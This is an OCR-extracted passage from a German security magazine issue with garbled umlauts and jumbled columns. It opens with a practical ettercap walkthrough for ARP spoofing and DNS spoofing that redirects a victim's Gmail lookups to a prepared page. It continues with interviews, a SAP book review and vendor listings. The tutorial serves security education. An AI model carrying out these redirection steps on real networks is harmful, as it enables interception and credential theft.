Grund fuumlr dessen Erfolg ist der dynamische ARP-Cache
auf jedem Client und eine Zuordnungstabelle auf jedem
Switch Ein Switch fuumlhrt eine Zuordnungstabelle worin die
MAC-Adressen der angeschlossenen Geraumlte dem jeweili-
gem Port zugeordnet sind Diese gibt es deshalb weil ein
Switch somit genau weiss welches System an welchem
Port angeschlossen ist und somit auch an welchen Port
ein einzelnes Datenpaket weitergeleitet werden muss
Der Client fuumlhrt einen eigenen ARP-Cache worin er
eine MAC-Adresse einer IP-Adresse zuordnet sodass
er nicht vor jedem Versenden eines Paketes die MAC-
Adresse zu einer IP neu abfragen muss
Veranschaulicht koumlnnte das dann so ablaufen (Bild 1)
nen ARP-Cache nach der MAC-Adresse des Zieles
ab und packt diese danach mit in das Paket
aus und weiss anhand seiner Zuordnungstabelle
das zu dieser MAC-Adresse der Port 1 gehoumlrt wo-
rauf er das Paket an Port 1 und somit an das Ziel
weiterleitet
seines Opfers so veraumlndern dass eine IP-Adresse einer
total neuen beliebigen MAC-Adresse zugeordnet wird
Abbildung 2 Eine Anfrage (rot) an Ziel waumlhrend ARP-Spoofi ng
DNS Cache Poisoning
hakin9orgde 39
Nun gilt es fuumlr den Angreifer darauf zu warten bis das
Opfer den A-Record von gmailcom abfragt Sehen wir
nun in unserem mitgehoumlrten Traffic eine solche Anfra-
ge so muss das Antwortpaket soweit veraumlndert werden
dass anstatt die tatsaumlchliche IP-Adresse nun die IP-Ad-
resse zu unserer praumlparierten Seite uumlbermittelt wird
Das Opfer selbst empfaumlngt und akzeptiert das so
weil es selbst von der Veraumlnderung nichts mitbekommt
Alle Anfragen welche das Opfer von nun an an Gmail
macht werden nicht an Gmail selbst sondern an un-
sere praumlparierte Seite gesandt womit unser Vorhaben
erfuumlllt waumlre
So nun genug Theorie schreiten wir zur Tat
Beide Schritte koumlnnen direkt mit ettercap durchge-
fuumlhrt werden
Dabei handelt es sich um ein Stuumlck Software mit Spe-
zialisierung auf Man-in-the-Middle-Attacken welches
unter der GPL wahlweise fuumlr Windows Linux oder Mac
veroumlffentlicht wurde
Leider wurde es seit einiger Zeit nicht mehr weiter-
entwickelt was sich jedoch nicht auf die Funktionalitaumlt
auswirkt
Ettercap kann wahlweise via GUI oder Konsole be-
dient werden doch erstmal wird alles konfiguriert
Zuerst muumlssen wir unsere eigenen A-Rekords fuumlr
gmailcom anlegen Dazu editieren wir die Datei usr
shareettercapetterdns und erweitern diese um einen
Eintrag wie in Listing 1 dargestellt
Wenn wir nun speichern so haben wir festgelegt
dass Anfragen nach der IP von gmailcom oder gmail
com mit 127001 beantwortet werden sollen
Somit sind wir auch schon bereit und koumlnnen bereits
mit Schritt 1 beginnen
Dazu starten wir ettercap und waumlhlen unter dem
Punkt Sniff den Unterpunkt Unified sniffing aus Dabei
werden wir nach dem Interface gefragt uumlber welches
der Angreifer mit dem Netzwerk des Opfers verbunden
ist Im Falle einer Verbindung via Kabel ist das meist
eth0 bei WLAN meist wlan0
Ist auch das vollbracht so koumlnnen das oder die Ziele
identifiziert werden Dazu waumlhlen wir den Punkt Hosts gt
Scan for hosts wodurch automatisch alle 255 Hosts im
Subnet angepingt werden (Bild 3)
Ist auch das durchgestanden so koumlnnen die Ziele un-
ter Hosts gt Hosts list ausgewaumlhlt werden Als Target 1
muss der Router oder Gateway und das Opfer als Tar-
get 2 ausgewaumlhlt werden Hier muss gegebenenfalls
mit nmap nach gepruumlft werden um die IP des Opfers zu
identifizieren
Nun kann mit dem Selektieren von Mitm gt Arp poiso-
ning die ARP-Attacke gestartet und Schritt 1 somit be-
endet werden
Wird nun Wireshark oder tcpdump gestartet so kann
man allen Netzwerkverkehr des Opfers und des Rou-
ters Gateways mitgehoumlrt werden
Nun gleich weiter zu Schritt 2 Nachdem die Man-in-
the-Middle-Attacke steht koumlnnen wir dem Opfer nun
unsere DNS-Records aufzwingen
Dazu verwenden wir die ettercap-Plugins unter dem
Punkt Plugins gt Manage the plugins Da waumlhlen wir den
Punkt dns_spof aus
Und somit ist unser DNS-Spoofing-Angriff einsatzfauml-
hig und aktiv
Wem als Angreifer kein GUI zur Verfuumlgung steht der
kann auch den interaktiven Modus von ettercap ver-
wenden Dazu muss ettercap nur mit der Option -T auf-
gerufen werden Alles weitere ist dann in der Hilfe (h-
Taste) nachzulesen
Nun ist alles getan Jedes mal wenn nun unser Op-
fer die Webseite von Gmail aufruft wird es auf unsere
praumlparierte Seite umgeleitet ohne dass es davon etwas
merkt
In Kombination mit SET erhaumllt ein Angreifer so muumlhe-
los Zugriff auf ein fremdes System
Listing 1 ein A-Record fuumlr eine praumlparierte Seite von gmailcom
gmailcom A 127001
gmailcom A 127001
Abbildung 3 GTK-GUI von ettercap
Linkshttpseiconch Unternehmen des Autorshttpblogencodingitch
PATRICK SCHMIDDer Autor ist System Engineer im Bereich Linux Unix und unterstuumltzt nebenbei die Entwicklung und Verbreitung von Li-nux und Opensource im privaten wie auch im professionellen Umfeld
Interview mit Tobias Glemser
hakin9orgde 41
hakin9 Erzaumlhlen Sie uns bitte ein wenig uumlber sich selbst wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie sich mit IT-Sicherheit Branche beschaumlftigenTobias Glemser Mein Name ist Tobias Glemser ich bin leitender IT-Sicherheitsberater bei der Tele-Consul-ting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbereich Penetrationstests Zu Schul- und Zivildienstzeiten hatte ich bereits den ersten Kontakt mit technischen Audits und habe schlicht das Hobby zum Beruf gemacht Seit uumlber zehn Jahren bin ich in entsprechenden Projekten taumltig Am Wichtigsten ist der kreative Umgang mit Sys-temen und Anwendungen Funktionen die ein Entwick-ler nach besten Wissen und Gewissen implementiert hat so zu nutzen dass sie nicht mehr dem urspruumlngli-chen Zweck dienen Im Projektumfeld erhaumllt man viele Einblicke in Techniken und Prozesse in unterschiedli-chen Firmen und Behoumlrden z B Energie Flugraum-uumlberwachung Banken Neben den technischen Aspek-ten ist es mein und unser Ziel mit allen Beteiligten des Kunden ein gemeinsames Ziel zu erreichen So waumlre es aus meiner Sicht unsinnig technische Schwachstellen mit rein technischen Hilfestellungen zu beheben Der Ansatz springt deutlich zu kurz Vielmehr geht es auch darum auf Prozesse abzuleiten und diese zu verbes-sern Diese Nachhaltigkeit und die positiven Ruumlckmel-dungen treiben an Daruumlber hinaus bin ich frei in der Beratung d h wir haben keine Produkte im Portfolio die bei einem technischen Audit moumlglichst gleich mit an-gepriesen werden muumlssen
hakin9 Bereits bei mehreren tausend Tests von Netzen und Systemen haben Sie den selbstentwickelten Security Scanner tajanas genutzt Was unterscheidet tajanas von anderen solchen WerkzeugenTobias Glemser Wir haben tajanas zunaumlchst fuumlr ei-gene Zwecke entwickelt und setzten es auch heute als Basis in Penetrationstests ein tajanas ist ein Frame-
work und Webfrontend fuumlr die grundsaumltzliche Pruumlfung eines Systems mit automatisierten Port- und Vulnera-bility-Scans und einheitlichem Reporting pro System Wir haben dabei das Ziel verfolgt nicht das Rad neu zu erfinden sondern etablierte Programme fuumlr die ei-gentlichen Pruumlfungen zu nutzen Die Ergebnisse der einzelnen Schritte werden analog zu einer manuellen Pruumlfung mit den jeweiligen Programmen automatisiert verknuumlpft Dies ermoumlglicht eine wesentliche schnellere Durchfuumlhrung bei gleicher Ergebnis-Qualitaumlt Daruumlber hinaus ist die Oberflaumlche so gehalten dass nur die not-wendigsten Optionen zur Verfuumlgung stehen
Neben der Schwachstellen-Pruumlfung ist auch eine Erreichbarkeitspruumlfung integriert um einen schnellen Uumlberblick uumlber aktive Systeme in Netzen zu erhalten
Es ist wichtig zu verstehen dass Penetrationstests ohne automatisierte Tests nicht funktionieren Die schie-re Anzahl an Schwachstellen laumlsst sich nur sinnvoll mit entsprechenden Programmen pruumlfen Die Ergebnisse sind dann die Basis fuumlr weitere manuelle Tests Dabei wird mit Know-How und Kreativitaumlt versucht weitere Luumlcken zu finden um und diese dann auszunutzen
hakin9 Wie erfolgt die Bedienung des Scanners und welche Lizenzen und Module existierenTobias Glemser Die Bedienung erfolgt vollstaumlndig uumlber eine webbasierte Oberflaumlche tajanas wird als VM-ware- oder Hardware-Appliance ausgeliefert der End-benutzer kann alle Funktionen ndash dazu gehoumlren auch Ak-tualisierungen ndash uumlber die Weboberflaumlche nutzen Jeder Nutzer erhaumllt natuumlrlich trotzdem vollstaumlndigen Root-Zu-griff auf das System Die Lizenzierung erfolgt pro In-stallation eine Limitierung auf IP-Adressen oder eine gewisse Anzahl Scans erfolgt nicht Neben dem Audit-Modul gibt es auch ein Modul fuumlr die Erreichbarkeits-pruumlfung
hakin9 Woher kommt der Name tajanasTobias Glemser tajanas steht fuumlr bdquothis ainrsquot just ano-ther network scannerrdquo ndash weil es ein wie beschrieben ein
bdquoSicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollinstrument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoInterview mit Tobias Glemser
10201042
INTERVIEW
Nach der Durchfuumlhrung erhaumllt der Kunde einem umfas-senden auf seine Umgebung und Realitaumlt angepass-ten Ergebnisbericht der im Rahmen eines Abschluss-Workshops mit den technischen verantwortlichen besprochen wird Auf Wunsch erfolgt auch die Darstel-lung vor dem Vorstand bzw der Leitungsebene
Das Spektrum eines Penetrationstests ist sehr viel-faumlltig und laumlsst sich nur schwer darstellen Es handelt sich dabei jedoch nicht zwingend um die bdquobekanntenldquo Pruumlfungen auf Serversysteme Haumlufige Einfallstore fuumlr Angreifer sind schlecht gesicherte lokale Netzwerke Client-Systeme oder auch Multifunktionsdrucker Bei Interesse finden sich Informationen z B in der Studie Penetrationstests des BSI dem Whitepaper Penetrati-
onstests der Tele-Consulting oder auch dem Whitepa-per Projektierung der Sicherheitspruumlfung von Weban-
wendungen der OWASP
hakin9 Welche Plaumlne die IT-Sicherheit Branche betreffend haben Sie noch vorTobias Glemser Abseits von technischen Audits ver-suchen wir ganzheitliche Prozesse vor allem aber nicht nur in den IT-Abteilungen zu etablieren und dabei Ad-ministratoren die Hilfestellungen zu geben die sie da-bei benoumltigen Als Sicherheitsberater oder auch Sicher-heitsbeauftrager eines Unternehmens nimmt man meist die Rolle eines Kontrolleurs ein der darauf achtet dass Regeln eingehalten werden Hier ist ein Wandel erfor-derlich sowohl bei denen die sich bdquoSicherheitldquo auf die Fahnen schreiben als auch bei den Administratoren und Verantwortlichen fuumlr Geschaumlftsbereiche und deren Technik Sicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollin-strument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgrei-chen Produkts gesehen werden Hier muumlssen auch und vor allem Sicherheitsberater umdenken um vorrangig als Unterstuumltzer die sie sind gesehen und akzeptiert zu werden Nur so begreifen die technisch verantwort-lichen Mitarbeiter Sicherheitspruumlfungen nicht als Pruuml-fungen ihrer persoumlnlichen Kompetenz sondern als kon-krete Unterstuumltzung fuumlr die Verbesserung vorhandener Sicherheitsprozesse
Im Bereich der technischen Schwachstellen werden weiterhin Webanwendungen eine groszlige Rolle spielen Daher bin ich seit geraumer Zeit beim Open Web Appli-cation Security Project (OWASP) den meisten vermut-lich durch die OWASP Top 10 bekannt ehrenamtlich taumltig und seit diesem Jahr im Board der deutschen Sek-tion Beim OWASP Stammtisch Stuttgart (und Stamm-tischen in anderen Staumldten) tauschen sich hier auch Menschen rund um das Thema zwanglos aus Wer Lust hat vorbeizukommen kann sich auf der deutschen OWASP Webseite informieren
Wir bedanken uns fuumlr das Gespraumlch
Framework darstellt und nicht den n-ten Port- oder Vul-nerability-Scanner Wenn wir Bugs in den verwendeten Programmen feststellen oder Ideen fuumlr Erweiterungen haben geben wir diese direkt in die Community zuruumlck
hakin9 Wer sind Benutzer von tajanasTobias Glemser Zum einen natuumlrlich wir selbst Zum anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-soren das Tool fuumlr regelmaumlszligige Sicherheitspruumlfungen ihrer Netze ein
hakin9 Fuumlr welche Faumllle reichen Penetrationstests nicht ausTobias Glemser Das haumlngt von der Zieldefinition des Kunden ab und was man unter einem Penetrationstest versteht Bei Tele-Consulting sind alle Mitarbeiter nicht nur in technische Audits wie Penetrationstests eingebun-den sondern auch in prozessorientierte Beratungen und Audits wie z B ISO 27001 oder BSI IT-Grundschutz Dies ermoumlglicht es uns in technischen Audits nicht nur die technischen Luumlcken aufzuzeigen sondern auch auf fehlende oder mangelhafte Prozesse hinzuweisen und konkrete Vorschlaumlge zur Verbesserung zu geben
hakin9 Koumlnnen Sie uns ein konkretes Beispiel nennenTobias Glemser Nehmen wir an dass aus Wirtschaft-lichkeitsgruumlnden nicht alle Server in einem Netz in ein technisches Audit einbezogen werden sondern nur eine definierte Anzahl Stellt man hier Schwachstellen fest so genuumlgt es nicht die erkannten Schwachstellen oder gar Luumlcken zu schlieszligen sondern man muss sich fra-gen wie es zu den Schwachstellen kommen konnte In den seltensten Faumlllen haben hier Administratoren indi-viduelle Fehler gemacht vielmehr scheinen offensicht-lich die Vorgaben zur Serverkonfiguration bzw Haumlrtung nicht ausreichend zu sein bzw diese in ein Information Security Management System (ISMS) integriert zu sein Darauf weisen wir nachdruumlcklich in unseren Ergebnis-berichten hin um eine Gesamtverbesserung zu erzie-len und unterstuumltzen bei Bedarf auch bei der Umset-zung der organisatorischen Anteile
Geht man diesen Schritt nicht werden erfahrungs-gemaumlszlig nur die Systeme veraumlndert bei denen im Test Schwachstellen erkannt wurden Der Verbesserung der Gesamtsicherheit hilft dies dann allerdings nicht
hakin9 Wie sieht eine Sicherheitsuumlberpruumlfung mithilfe des Penetrationstests ausTobias Glemser Zunaumlchst bedarf es einer klaren Ziel-vorstellung Entweder haben Kunden diese bereits oder sie wird im Rahmen eines Workshops gemeinsam erarbeitet Dabei ist es meist sinnvoll mehrstufig vorzu-gehen und die Themen in verschiedenen Arbeitspake-ten abzuarbeiten Im Rahmen eines Kick-Offs werden die Beteiligten informiert und in den Ablauf integriert
10201044
INTERVIEW
hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso vorhanden wie am ersten Tag
hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
